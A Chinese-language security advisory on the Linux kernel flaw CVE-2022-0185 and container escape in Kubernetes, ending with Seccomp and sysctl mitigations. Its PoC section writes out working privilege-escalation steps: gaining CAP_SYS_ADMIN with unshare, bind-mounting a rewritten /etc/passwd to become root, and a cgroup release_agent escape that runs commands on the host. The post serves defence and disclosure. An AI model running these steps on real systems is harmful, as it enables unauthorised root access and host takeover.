高危！！Kubernetes 新型容器逃逸漏洞預警

作者：米開朗基楊，KubeSphere 佈道師，雲原生重度感染者

2022 年 1 月 18 日，Linux 維護人員和供應商在 Linux 核心（5.1-rc1+）檔案系統上下文功能的 legacy_parse_param 函式中發現一個堆緩衝區溢位漏洞，該漏洞的 ID 編號為 CVE-2022-0185，屬於高危漏洞，嚴重等級為 7.8。

該漏洞允許在核心記憶體中進行越界寫入。利用這個漏洞，無特權的攻擊者可以繞過任何 Linux 名稱空間的限制，將其許可權提升到 root。例如，如果攻擊者滲透到你的容器中，就可以從容器中逃逸，提升許可權。

該漏洞於 2019 年 3 月被引入 Linux 核心 5.1-rc1 版本。1 月 18 日釋出的補丁修復了這個問題，建議所有 Linux 使用者下載並安裝最新版本的核心。

漏洞細節

該漏洞是由檔案系統上下文功能（fs/fs_context.c）的 legacy_parse_param 函式中發現的整數下溢條件引起的。檔案系統上下文的功能是建立用於掛載和重新掛載檔案系統的超級塊，超級塊記錄了一個檔案系統的特徵，如塊和檔案大小，以及任何儲存塊。

通過向 legacy_parse_param 函式傳送超過 4095 位元組的輸入，便可以繞過輸入長度檢測，導致越界寫入，觸發該漏洞。攻擊者可以利用此漏洞將惡意程式碼寫入記憶體的其他部分，導致系統崩潰，或者可以執行任意程式碼以提升許可權。

legacy_parse_param 函式的輸入資料是通過 fsconfig 系統呼叫新增的，以用於配置檔案系統的建立上下文（如 ext4 檔案系統的超級塊）。

// 使用 fsconfig 系統呼叫新增由 val 指向的以空字元（NULL）結尾的字串
fsconfig(fd, FSCONFIG_SET_STRING, "\x00", val, 0);

要使用 fsconfig 系統呼叫，非特權使用者必須至少在其當前名稱空間中具有 CAP_SYS_ADMIN 特權。這意味著如果使用者可以進入另一個具有這些許可權的名稱空間，則足以利用此漏洞。

如果非特權使用者無法獲得 CAP_SYS_ADMIN 許可權，攻擊者可以通過 unshare(CLONE_NEWNS|CLONE_NEWUSER) 系統呼叫獲得該許可權。Unshare 系統呼叫可以讓使用者建立或克隆一個名稱空間或使用者，從而擁有進行進一步攻擊所需的必要許可權。這種技術對於使用 Linux 名稱空間來隔離 Pod 的 Kubernetes 和容器世界非常重要，攻擊者完全可以在容器逃逸攻擊中利用這一點，一旦成功，攻擊者便可以獲得對主機作業系統和系統上執行的所有容器的完全控制許可權，從而進一步攻擊內部網段的其他機器，甚至可以在 Kubernetes 叢集中部署惡意容器。

發現該漏洞的研究團隊於 1 月 25 日在 GitHub 上釋出了利用該漏洞的程式碼和概念證明。

PoC

Docker 和其他容器執行時預設都會使用 Seccomp 配置檔案來阻止容器中的程式使用危險的系統呼叫，以保護 Linux 名稱空間邊界。

Seccomp（全稱：secure computing mode）在 2.6.12 版本（2005年3月8日）中引入 Linux 核心，將程式可用的系統呼叫限制為四種：read，write，_exit，sigreturn。最初的這種模式是白名單方式，在這種安全模式下，除了已開啟的檔案描述符和允許的四種系統呼叫，如果嘗試其他系統呼叫，核心就會使用 SIGKILL 或 SIGSYS 終止該程式。

然而 Kubernetes 預設情況下並不會使用任何 Seccomp 或 AppArmor/SELinux 配置檔案來限制 Pod 的系統呼叫，這就很危險了，Pod 中的程式可以自由訪問危險的系統呼叫，伺機獲得必要的特權（例如 CAP_SYS_ADMIN），以便進一步攻擊。

我們先來看一個 Docker 的例子，在標準的 Docker 環境中，unshare 命令是無法使用的，Docker 的 Seccomp 過濾器阻止了這個命令使用的系統呼叫。

$ docker run --rm -it alpine /bin/sh
/ # unshare
unshare: unshare(0x0): Operation not permitted

再來看下 Kubernetes 的 Pod：

$ kubectl run --rm -it test --image=ubuntu /bin/bash
If you don't see a command prompt, try pressing enter.
root@test:/# lsns | grep user
4026531837 user        3   1 root /bin/bash
root@test:/#
root@test:/# apt update && apt install -y libcap2 libcap-ng-utils
root@test:/# ......
root@test:/# pscap -a
ppid  pid   name        command           capabilities
0     1     root        bash              chown, dac_override, fowner, fsetid, kill, setgid, setuid, setpcap, net_bind_service, net_raw, sys_chroot, mknod, audit_write, setfcap

可以看到 Pod 中的 root 使用者並沒有 CAP_SYS_ADMIN 能力，但我們可以通過 unshare 命令來獲取 CAP_SYS_ADMIN 能力。

root@test:/# unshare -Urm
#
# pscap -a
ppid  pid   name        command           capabilities
0     1     root        bash              chown, dac_override, fowner, fsetid, kill, setgid, setuid, setpcap, net_bind_service, net_raw, sys_chroot, mknod, audit_write, setfcap
1     265   root        sh                full
# lsns | grep user
4026532695 user        3   265 root -sh

那麼擁有了 CAP_SYS_ADMIN 可以做啥呢？這裡給出兩個示例，展示如何利用 CAP_SYS_ADMIN 來對系統進行滲透。

普通使用者提權為 root 使用者！

下面這段騷操作可以將主機中的普通使用者直接提權為 root 使用者。

先給 python3 賦予 CAP_SYS_ADMIN 能力（注意，不能對軟連結進行操作，只能操作原檔案）。

$ which python3
/usr/bin/python3

$ ll /usr/bin/python3
lrwxrwxrwx 1 root root 9 Mar 13  2020 /usr/bin/python3 -> python3.8*

$ setcap CAP_SYS_ADMIN+ep /usr/bin/python3.8
$ getcap /usr/bin/python3.8
/usr/bin/python3.8 = cap_sys_admin+ep

建立一個普通使用者。

$ useradd test -d /home/test -m

然後切換到普通使用者，並進入使用者 home 目錄。

$ su test
$ cd ~

將 /etc/passwd 複製到當前目錄，並將 root 使用者的密碼改完 "password"。

$ cp /etc/passwd ./
$ openssl passwd -1 -salt abc password
$1$abc$BXBqpb9BZcZhXLgbee.0s/

# 將第一行的 root:x 改為 root:$1$abc$BXBqpb9BZcZhXLgbee.0s/
$ head -2 passwd
root:$1$abc$BXBqpb9BZcZhXLgbee.0s/:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

將修改後的 passwd 檔案掛載到 /etc/passwd。

# cat mount-passwd.py
from ctypes import *
libc = CDLL("libc.so.6")
libc.mount.argtypes = (c_char_p, c_char_p, c_char_p, c_ulong, c_char_p)
MS_BIND = 4096
source = b"/home/test/passwd"
target = b"/etc/passwd"
filesystemtype = b"none"
options = b"rw"
mountflags = MS_BIND
libc.mount(source, target, filesystemtype, mountflags, options)

$ python3 mount-passwd.py

最後就是見證奇蹟的時刻！！！直接切換到 root 使用者，並輸入密碼 "password"。

$ su root
Password: 
root@coredns:/home/test#

好神奇，切換到 root 使用者了。。。

來看看是不是真的獲得了 root 的許可權吧：

$ find / -name "*flag*" 2>/dev/null
/sys/kernel/tracing/events/power/pm_qos_update_flags
/sys/kernel/debug/tracing/events/power/pm_qos_update_flags
/sys/kernel/debug/block/vdb/hctx0/flags
/sys/kernel/debug/block/vda/hctx0/flags
/sys/kernel/debug/block/loop7/hctx0/flags
/sys/kernel/debug/block/loop6/hctx0/flags
/sys/kernel/debug/block/loop5/hctx0/flags
/sys/kernel/debug/block/loop4/hctx0/flags
/sys/kernel/debug/block/loop3/hctx0/flags
/sys/kernel/debug/block/loop2/hctx0/flags
/sys/kernel/debug/block/loop1/hctx0/flags
/sys/kernel/debug/block/loop0/hctx0/flags
....

$ cat /sys/kernel/debug/block/vdb/hctx0/flags
alloc_policy=FIFO SHOULD_MERGE

嗯哼，是 root 沒錯了。

最後記得將 /etc/passwd 解除安裝哦。

$ umount /etc/passwd

所以，系統重啟工程師（System Reboot Engineer）們，趕緊看看你們分配給其他人的普通使用者有沒有 CAP_SYS_ADMIN 能力吧~~

容器中檢視主機所有程式！

再來看一個容器的例子，下面這段騷操作可以讓你在容器中獲取到主機正在執行的所有程式。

我們不需要使用 --privileged 引數來執行特權容器，那樣就沒意思啦。

$ docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash

接下來在容器中執行下面的命令，最終的效果是在主機上執行 ps aux 命令，並將其輸出儲存到容器中的 /output 檔案。

# Mounts the RDMA cgroup controller and create a child cgroup
# This technique should work with the majority of cgroup controllers
# If you're following along and get "mount: /tmp/cgrp: special device cgroup does not exist"
# It's because your setup doesn't have the RDMA cgroup controller, try change rdma to memory to fix it
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
# Finds path of OverlayFS mount for container
# Unless the configuration explicitly exposes the mount point of the host filesystem
# see https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
# Sets release_agent to /path/payload
echo "$host_path/cmd" > /tmp/cgrp/release_agent
# Creates a payload
echo '#!/bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd
chmod a+x /cmd
# Executes the attack by spawning a process that immediately ends inside the "x" child cgroup
# By creating a /bin/sh process and writing its PID to the cgroup.procs file in "x" child cgroup directory
# The script on the host will execute after /bin/sh exits 
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
# Reads the output
cat /output

最終你可以在容器中看到主機中執行的所有程式：

root@0c84f7587629:/# cat /output
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.3 172704 13148 ?        Ss    2021 131:32 /sbin/init nopti
root           2  0.0  0.0      0     0 ?        S     2021   0:18 [kthreadd]
root           3  0.0  0.0      0     0 ?        I<    2021   0:00 [rcu_gp]
root           4  0.0  0.0      0     0 ?        I<    2021   0:00 [rcu_par_gp]
root           6  0.0  0.0      0     0 ?        I<    2021   0:00 [kworker/0:0H-kblockd]
root           8  0.0  0.0      0     0 ?        I<    2021   0:00 [mm_percpu_wq]
root           9  0.0  0.0      0     0 ?        S     2021  18:36 [ksoftirqd/0]
root          10  0.0  0.0      0     0 ?        I     2021 262:22 [rcu_sched]
root          11  0.0  0.0      0     0 ?        S     2021   3:06 [migration/0]
root          12  0.0  0.0      0     0 ?        S     2021   0:00 [idle_inject/0]
root          14  0.0  0.0      0     0 ?        S     2021   0:00 [cpuhp/0]
root          15  0.0  0.0      0     0 ?        S     2021   0:00 [cpuhp/1]
......

這些命令的具體含義我就不解釋啦，感興趣的可以自己對照註釋研究一下。

可以確定的是，CAP_SYS_ADMIN 能力為攻擊者提供了更多的可能性，不管是在宿主機還是在容器中，尤其是容器環境，如果我們因為不可抗因素無法升級核心，就要尋求其他的解決方案。

解決方案

容器層面

從 v1.22 版本開始，Kubernetes 便可以使用 SecurityContext 將預設的 Seccomp 或 AppArmor 配置檔案新增到資源物件中，以保護 Pod、Deployment、Statefulset、Daemonset 等等。雖然這個功能目前處於 Alpha 階段，但使用者可以新增自己的 Seccomp 或 AppArmor 配置檔案，並在 SecurityContext 中定義它。例如：

# pod-test.yaml
apiVersion: v1
kind: Pod
metadata:
  name: protected
spec:
  containers:
    - name: protected
      image: ubuntu
      command:
      - sleep
      - infinity
      securityContext:
        seccompProfile:
          type: RuntimeDefault

建立 Pod 後，嘗試使用 unshare 獲得 CAP_SYS_ADMIN 能力。

$ kubectl exec -it protected -- bash
root@protected:/#
root@protected:/# unshare -Urm
unshare: unshare failed: Operation not permitted

輸出結果顯示，unshare 系統呼叫被成功阻止了，攻擊者便無法利用該能力進行攻擊。

主機層面

還有一種方案是從主機層面禁止使用者使用 user namespace 的能力，不需要重啟系統。例如，在 Ubuntu 中，只需要執行下面兩行命令便可即時生效，並且重啟系統後也會生效。

$ echo "kernel.unprivileged_userns_clone=0" > /etc/sysctl.d/userns.conf
$ sysctl -p /etc/sysctl.d/userns.conf

如果是 Red Hat 系的系統，可以執行下面的命令來達到同樣的效果。

$ echo "user.max_user_namespaces=0" > /etc/sysctl.d/userns.conf
$ sysctl -p /etc/sysctl.d/userns.conf

總結一下對於該漏洞的處理建議：

如果你的環境可以接受給核心打補丁，也能接受重啟系統，最好打補丁，或者升級核心。
減少使用能夠訪問 CAP_SYS_ADMIN 的特權容器。
對於沒有特權的容器，確保有一個 Seccomp 過濾器來阻止其對 unshare 的呼叫，以減少風險。Docker 沒問題，Kubernetes 需要額外操作。
未來可以為 Kubernetes 叢集中的所有工作負載啟用 Seccomp 配置檔案。目前該功能還處於 Alpha 階段，需要通過特性開關（feature gate）開啟。
在主機層面禁止使用者使用 user namespace 的能力。

寫在最後

容器環境錯綜複雜，特別是像 Kubernetes 這樣的分散式排程平臺，每一個環節都有自己的生命週期和攻擊面，很容易暴露出安全風險，容器叢集管理員必須注意每一處細節的安全問題。總的來說，絕大多數情況下容器的安全性都取決於 Linux 核心的安全性，因此，我們需要時刻關注任何安全問題，並儘快實施對應的解決方案。

參考資料

CVE-2022-0185: Kubernetes Container Escape Using Linux Kernel Exploit
CVE-2022-0185: Detecting and mitigating Linux Kernel vulnerability causing container escape
Excessive Capabilities
CAP_SYS_ADMIN
本文由部落格一文多發平臺 OpenWrite 釋出！